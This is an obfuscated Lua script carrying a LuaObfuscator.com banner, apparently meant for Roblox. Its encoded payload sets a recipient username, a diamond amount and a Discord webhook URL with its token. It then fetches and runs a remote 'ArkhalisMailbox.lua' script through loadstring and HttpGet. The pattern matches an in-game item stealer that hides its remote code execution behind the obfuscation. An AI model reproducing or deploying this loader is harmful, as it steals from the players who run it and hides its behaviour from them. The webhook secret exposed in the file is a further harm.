--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v99=0;local v100;while true do if (v99==0) then v100=v5(v85,v19);v19=nil;v99=1;end if (v99==1) then return v100;end end else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=(v31/(2^(v32-(2 -(1638 -(1523 + 114))))))%(2^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -1))) ;return v86-(v86%1) ;else local v87=(621 -(555 + 64))^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and ((838 + 94) -(857 + 74))) or (568 -(367 + 201)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==((237 + 828) -(68 + 997))) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (1272 -(226 + 1044)) ;v35=4 -3 ;end if (v35==(118 -(32 + 85))) then return (v37 * (251 + 5)) + v36 ;end end end local function v23()local v38=957 -(892 + 65) ;local v39;local v40;local v41;local v42;while true do if (v38==(2 -1)) then return (v42 * (31011612 -14234396)) + (v41 * 65536) + (v40 * 256) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + ((866 -513) -(87 + 263)) );v18=v18 + ((136 + 48) -(67 + 113)) ;v38=(3 -2) + 0 ;end end end local function v24()local v43=952 -(802 + 150) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(2 -1)) then v46=1 -0 ;v47=(v20(v45,1 + 0 + 0 ,20) * (2^(1029 -(915 + 82)))) + v44 ;v43=(4 + 1) -3 ;end if (v43==(2 + 0)) then v48=v20(v45,27 -6 ,1218 -(1069 + (1173 -(87 + 968))) );v49=((v20(v45,891 -(814 + 45) )==(2 -1)) and  -(1 + 0)) or ((8 -6) -1) ;v43=6 -3 ;end if (v43==(1 + 2)) then if (v48==(0 -0)) then if (v47==(0 + 0)) then return v49 * (0 + 0) ;else local v101=791 -(368 + 423) ;while true do if (v101==((0 -0) -0)) then v48=19 -(10 + 8) ;v46=0 -0 ;break;end end end elseif (v48==(2489 -(416 + 26))) then return ((v47==(0 -0)) and (v49 * ((767 -(745 + (1434 -(447 + 966))))/0))) or (v49 * NaN) ;end return v8(v49,v48-(440 + 583) ) * (v46 + (v47/((1 + 1)^(91 -39)))) ;end if (v43==(438 -(145 + 293))) then v44=v23();v45=v23();v43=431 -(44 + 386) ;end end end local function v25(v50)local v51=0 -0 ;local v52;local v53;while true do if (v51==(1817 -(1703 + 114))) then v52=nil;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=702 -((1430 -1054) + 325) ;end if (v51==((4 + 0) -(1181 -(1123 + 57)))) then return v6(v53);end if (((1270 -(243 + 1022)) -3)==v51) then v53={};for v91=1 + 0 + 0 , #v52 do v53[v91]=v2(v1(v3(v52,v91,v91)));end v51=6 -3 ;end if (v51==1) then v52=v3(v16,v18,(v18 + v50) -(15 -(9 + 5)) );v18=v18 + v50 ;v51=378 -(85 + (545 -(163 + 91))) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0 -0 ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v54==3) then v61=nil;v62=nil;v54=5 -1 ;end if (v54~=0) then else v55=341 -(218 + 123) ;v56=nil;v54=1;end if (v54==(1582 -(1535 + 46))) then v57=nil;v58=nil;v54=2;end if (v54~=2) then else v59=nil;v60=nil;v54=3 + 0 ;end if (v54==4) then while true do if (v55~=(1 + 1)) then else v60=nil;v61=nil;v55=3;end if (v55==(561 -(306 + 254))) then local v97=0;while true do if ((0 + 0)==v97) then v58=nil;v59=nil;v97=1;end if (v97==(1 -0)) then v55=1469 -(899 + 568) ;break;end end end if (v55==(2 + 1)) then v62=nil;while true do if (v56==0) then local v118=0;while true do if (v118~=(2 -1)) then else v59={};v60={v57,v58,nil,v59};v118=2;end if (v118==2) then v56=1;break;end if (v118~=0) then else v57={};v58={};v118=1;end end end if (v56~=(574 -(426 + 146))) then else for v122=1 + 0 ,v23() do local v123=1456 -(282 + 1174) ;local v124;while true do if (0~=v123) then else v124=v21();if (v20(v124,812 -(569 + 242) ,2 -1 )==(0 + 0)) then local v170=1024 -(706 + 318) ;local v171;local v172;local v173;local v174;while true do if (v170==(1252 -(721 + 530))) then local v177=1271 -(945 + 326) ;while true do if (v177==(2 -1)) then v170=2;break;end if (v177==(0 + 0)) then v173=nil;v174=nil;v177=701 -(271 + 429) ;end end end if (v170~=0) then else local v178=0 + 0 ;while true do if (1~=v178) then else v170=1501 -(1408 + 92) ;break;end if (v178==(1086 -(461 + 625))) then local v180=1288 -(993 + 295) ;while true do if (v180~=1) then else v178=1;break;end if (v180==0) then v171=0 + 0 ;v172=nil;v180=1;end end end end end if (v170==(1173 -(418 + 753))) then while true do if (v171==2) then local v181=0 + 0 ;local v182;while true do if (v181==(0 + 0)) then v182=0;while true do if (v182~=(1 + 0)) then else v171=3;break;end if (v182~=0) then else local v189=0 + 0 ;while true do if ((529 -(406 + 123))~=v189) then else if (v20(v173,1770 -(1749 + 20) ,1)==1) then v174[2]=v62[v174[1 + 1 ]];end if (v20(v173,1324 -(1249 + 73) ,2)~=1) then else v174[2 + 1 ]=v62[v174[1148 -(466 + 679) ]];end v189=1;end if (v189==1) then v182=1;break;end end end end break;end end end if ((6 -3)==v171) then if (v20(v173,3,8 -5 )==1) then v174[1904 -(106 + 1794) ]=v62[v174[2 + 2 ]];end v57[v122]=v174;break;end if (v171~=(1 + 0)) then else local v184=0 -0 ;while true do if (v184~=(2 -1)) then else v171=116 -(4 + 110) ;break;end if (v184==0) then local v188=0;while true do if ((584 -(57 + 527))==v188) then local v190=0;while true do if (v190~=1) then else v188=1;break;end if (v190~=0) then else v174={v22(),v22(),nil,nil};if (v172==0) then local v195=0;local v196;local v197;while true do if (v195==(1 + 0)) then while true do if (v196==(0 -0)) then v197=0 -0 ;while true do if (v197==0) then v174[3]=v22();v174[4]=v22();break;end end break;end end break;end if (v195~=(166 -(122 + 44))) then else v196=0 -0 ;v197=nil;v195=3 -2 ;end end elseif (v172==1) then v174[3 + 0 ]=v23();elseif (v172==2) then v174[1 + 2 ]=v23() -(2^16) ;elseif (v172~=3) then else local v200=0 -0 ;local v201;while true do if (v200==(65 -(30 + 35))) then v201=0;while true do if ((0 + 0)==v201) then v174[1260 -(1043 + 214) ]=v23() -(2^16) ;v174[4]=v22();break;end end break;end end end v190=1;end end end if (v188==1) then v184=3 -2 ;break;end end end end end if (v171==0) then local v185=1212 -(323 + 889) ;while true do if (v185==(0 -0)) then v172=v20(v124,582 -(361 + 219) ,3);v173=v20(v124,4,326 -(53 + 267) );v185=1 + 0 ;end if ((414 -(15 + 398))~=v185) then else v171=983 -(18 + 964) ;break;end end end end break;end end end break;end end end for v125=1,v23() do v58[v125-(3 -2) ]=v28();end return v60;end if (v56==(1 + 0)) then v61=v23();v62={};for v127=1,v61 do local v128=0;local v129;local v130;local v131;while true do if (v128==(1 + 0)) then v131=nil;while true do if (v129==(851 -(20 + 830))) then if (v130==(1 + 0)) then v131=v21()~=(126 -(116 + 10)) ;elseif (v130==(1 + 1)) then v131=v24();elseif (v130~=3) then else v131=v25();end v62[v127]=v131;break;end if (v129==0) then local v176=738 -(542 + 196) ;while true do if (v176~=(0 -0)) then else local v179=0;while true do if (v179==0) then v130=v21();v131=nil;v179=1;end if (v179==(1 + 0)) then v176=1 + 0 ;break;end end end if (v176~=1) then else v129=1 + 0 ;break;end end end end break;end if (v128==(0 -0)) then local v169=0;while true do if (v169==0) then v129=0 -0 ;v130=nil;v169=1552 -(1126 + 425) ;end if (v169~=1) then else v128=1;break;end end end end end v60[408 -(118 + 287) ]=v21();v56=2;end end break;end if (v55==0) then local v98=0 -0 ;while true do if (v98==(1122 -(118 + 1003))) then v55=2 -1 ;break;end if (v98==(377 -(142 + 235))) then v56=0 -0 ;v57=nil;v98=1 + 0 ;end end end end break;end end end local function v29(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v69=v66;local v70=v67;local v71=v68;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=3) then if (v82<=1) then if (v82==0) then local v102=0;local v103;local v104;while true do if (v102==5) then v81=v69[v73];v104=v81[2];v103=v79[v81[3]];v79[v104 + 1 ]=v103;v79[v104]=v103[v81[4]];v102=6;end if (v102==6) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];break;end if (v102==3) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v102=4;end if (v102==0) then v103=nil;v104=nil;v79[v81[2]]=v65[v81[3]];v73=v73 + 1 ;v81=v69[v73];v102=1;end if (v102==1) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v65[v81[3]];v73=v73 + 1 ;v102=2;end if (v102==4) then v79[v81[2]]=v65[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v65[v81[3]];v73=v73 + 1 ;v102=5;end if (v102==2) then v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v65[v81[3]];v102=3;end end else v79[v81[2]]=v81[3];end elseif (v82==2) then do return;end else local v107=0;local v108;local v109;while true do if (0==v107) then v108=v81[2];v109=v79[v81[3]];v107=1;end if (v107==1) then v79[v108 + 1 ]=v109;v79[v108]=v109[v81[4]];break;end end end elseif (v82<=5) then if (v82==4) then local v110=v81[2];v79[v110]=v79[v110](v13(v79,v110 + 1 ,v74));else local v112=v81[2];local v113,v114=v72(v79[v112](v13(v79,v112 + 1 ,v81[3])));v74=(v114 + v112) -1 ;local v115=0;for v120=v112,v74 do local v121=0;while true do if (v121==0) then v115=v115 + 1 ;v79[v120]=v113[v115];break;end end end end elseif (v82<=6) then v79[v81[2]]=v65[v81[3]];elseif (v82>7) then v79[v81[2]]();else v79[v81[2]][v81[3]]=v81[4];end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365726E616D65030A3O004D7248656176656E2O7803083O004469616D6F6E6473024O0080841E4103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31303638363537312O392O353639333630382F523641555046715F413330643562386876446570632D554C4B486A4D7955682D4D6B556E6158624D6A6E4E4438522D6433696133566E4B70394E77532D4F5830522O2D76030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C7561000E3O00124O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00083O00122O000100093O00202O00010001000A00122O0003000B4O0005000100034O00045O00022O00083O000100012O00023O00017O00",v9(),...);end
